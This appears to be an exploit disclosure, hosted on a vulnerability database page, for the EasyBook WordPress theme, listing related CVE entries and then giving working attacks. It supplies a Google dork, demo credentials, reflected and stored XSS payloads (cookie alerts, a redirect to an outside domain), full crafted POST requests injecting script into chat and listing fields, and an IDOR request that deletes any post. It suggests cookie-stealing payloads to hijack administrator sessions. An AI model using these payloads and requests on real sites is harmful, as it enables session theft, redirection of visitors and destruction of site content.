| Reporter | Title | Published | Views | Family All 42 |
|---|---|---|---|---|
| WordPress CTHthemes CityBook, TownHub and EasyBook Cross-Site Scripting Vulnerabilities | 14 Jan 202000:00 | – | cnvd | |
| WordPress CTHthemes CityBook, TownHub and EasyBook Cross-Site Scripting Vulnerabilities (CNVD-2020-16659) | 22 Jan 202000:00 | – | cnvd | |
| WordPress CTHthemes Unspecified Vulnerability in CityBook, TownHub and EasyBook | 22 Jan 202000:00 | – | cnvd | |
| WordPress CTHthemes CityBook, TownHub and EasyBook Cross-Site Scripting Vulnerabilities (CNVD-2020-16668) | 22 Jan 202000:00 | – | cnvd | |
| CVE-2019-20209 | 13 Jan 202017:05 | – | cve | |
| CVE-2019-20210 | 13 Jan 202017:16 | – | cve | |
| CVE-2019-20211 | 13 Jan 202017:39 | – | cve | |
| CVE-2019-20212 | 13 Jan 202017:44 | – | cve | |
| CVE-2019-20209 | 13 Jan 202017:05 | – | cvelist | |
| CVE-2019-20210 | 13 Jan 202017:16 | – | cvelist |
| Source | Link |
|---|---|
| themeforest | www.themeforest.net/item/easybook-directory-listing-wordpress-theme/23206622 |
----[]- Info: -[]----
Demo website: https://www.easybook.cththemes.org/
Demo account: m0ze2/asdasd (login/password)
PoC listing: https://www.easybook.cththemes.org/dashboard/#/listingsPending
Google Dork: /wp-content/themes/easybook/
Date: 27/12/2019
----[]- Reflected XSS: -[]----
Input field with placeholder «Hotel , City...» on the homepage is vulnerable. Same thing with a regular search (block under the «Add Listing» button).
Payload Sample #0: <img src=x onerror=alert(document.cookie)>
Payload Sample #1: <img src=x onerror=window.location=`https://m0ze.ru`;>
PoC #0: https://www.easybook.cththemes.org/?search_term=%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E&checkin=&checkout=&adults=1&children=0
PoC #1: https://www.easybook.cththemes.org/?search_term=%3Cimg+src%3Dx+onerror%3Dwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%3E&checkin=&checkout=&adults=1&children=0
----[]- Persistent XSS -> Chat: -[]----
Possibility to use any cookie stealing payload to hijack user/administrator session or force redirect to malicious website (from https://www.easybook.cththemes.org/dashboard/#/chats or from chat widget on the bottom right corner).
Payload Sample #0: <img src=x onerror=alert(`m0ze`)>
Payload Sample #1: <img src=x onerror=window.location=`https://m0ze.ru`;>
PoC:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: www.easybook.cththemes.org
User-Agent: Mozilla/5.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Origin: https://www.easybook.cththemes.org
DNT: 1
Connection: close
Referer: https://www.easybook.cththemes.org/dashboard/
Cookie: _your_cookies_here_
action=easybook_addons_chat_reply&_nonce=1c8cd14288&cid=600&user_id=XXX&touid=1&reply_text=_payload_
Where:
user_id=XXX (your unique WordPress ID);
touid=1 (message receiver ID, in this example ID 1 == account «admin»);
reply_text=_payload_ (your payload).
----[]- Persistent XSS -> Listing page: -[]----
Add new listing here https://www.easybook.cththemes.org/dashboard/#/addListing (first time you need to order a «Free» plan and go to this URL again).
Vulnerable input fields: «Address», «Longitude», «Latitude», «Fact Title» and «Fact Number».
Payload Sample #0: "><img src=x onerror=alert(document.cookie)>
Payload Sample #1: "><h1>Greetings from m0ze</h1>
Payload Sample #2: "><script>alert(`PoC`);</script>
PoC:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: www.easybook.cththemes.org
User-Agent: Mozilla/5.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------970149683563
Content-Length: 4142
Origin: https://www.easybook.cththemes.org
DNT: 1
Connection: close
Referer: https://www.easybook.cththemes.org/dashboard/
Cookie: _your_cookies_here_
-----------------------------970149683563
Content-Disposition: form-data; name="lid"
0
-----------------------------970149683563
Content-Disposition: form-data; name="listing_type_id"
5058
-----------------------------970149683563
Content-Disposition: form-data; name="isSubmit"
true
-----------------------------970149683563
Content-Disposition: form-data; name="working_hours[timezone]"
America/New_York
-----------------------------970149683563
Content-Disposition: form-data; name="working_hours[Monday][static]"
enterHours
-----------------------------970149683563
Content-Disposition: form-data; name="working_hours[Tuesday][static]"
enterHours
-----------------------------970149683563
Content-Disposition: form-data; name="working_hours[Wednesday][static]"
enterHours
-----------------------------970149683563
Content-Disposition: form-data; name="working_hours[Thursday][static]"
enterHours
-----------------------------970149683563
Content-Disposition: form-data; name="working_hours[Friday][static]"
enterHours
-----------------------------970149683563
Content-Disposition: form-data; name="working_hours[Saturday][static]"
enterHours
-----------------------------970149683563
Content-Disposition: form-data; name="working_hours[Sunday][static]"
enterHours
-----------------------------970149683563
Content-Disposition: form-data; name="locations"
US|M
-----------------------------970149683563
Content-Disposition: form-data; name="title"
PoC
-----------------------------970149683563
Content-Disposition: form-data; name="address"
"><img src=x onerror=alert(1)>
-----------------------------970149683563
Content-Disposition: form-data; name="longitude"
"><img src=x onerror=alert(2)>
-----------------------------970149683563
Content-Disposition: form-data; name="latitude"
"><img src=x onerror=alert(3)>
-----------------------------970149683563
Content-Disposition: form-data; name="author_email"
M
-----------------------------970149683563
Content-Disposition: form-data; name="author_phone"
M
-----------------------------970149683563
Content-Disposition: form-data; name="author_website"
M
-----------------------------970149683563
Content-Disposition: form-data; name="content"
"><img src=x onerror=alert(document.domain)>
-----------------------------970149683563
Content-Disposition: form-data; name="features[0]"
303
-----------------------------970149683563
Content-Disposition: form-data; name="features[1]"
300
-----------------------------970149683563
Content-Disposition: form-data; name="features[2]"
305
-----------------------------970149683563
Content-Disposition: form-data; name="features[3]"
302
-----------------------------970149683563
Content-Disposition: form-data; name="facts[0][title]"
"><img src=x onerror=alert(9)>
-----------------------------970149683563
Content-Disposition: form-data; name="facts[0][number]"
"><img src=x onerror=alert(10)>
-----------------------------970149683563
Content-Disposition: form-data; name="facts[0][icon]"
123
-----------------------------970149683563
Content-Disposition: form-data; name="lservices[0][service_id]"
-imgsrcxonerroralert12
-----------------------------970149683563
Content-Disposition: form-data; name="lservices[0][service_name]"
M
-----------------------------970149683563
Content-Disposition: form-data; name="lservices[0][service_desc]"
M
-----------------------------970149683563
Content-Disposition: form-data; name="lservices[0][service_price]"
0
-----------------------------970149683563
Content-Disposition: form-data; name="action"
submit_listing
-----------------------------970149683563
Content-Disposition: form-data; name="_wpnonce"
1c8cd14288
-----------------------------970149683563--
----[]- IDOR: -[]----
Delete any post/page/listing:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: www.easybook.cththemes.org
User-Agent: Mozilla/5.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
Origin: https://www.easybook.cththemes.org
DNT: 1
Connection: close
Referer: https://www.easybook.cththemes.org/dashboard/
Cookie: _your_cookies_here_
action=easybook_addons_delete_listing&_nonce=1c8cd14288&lid=XXXX
Where:
lid=XXXX (page/post/listing unique WordPress ID, can be discovered as a page class for <body> tag).Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation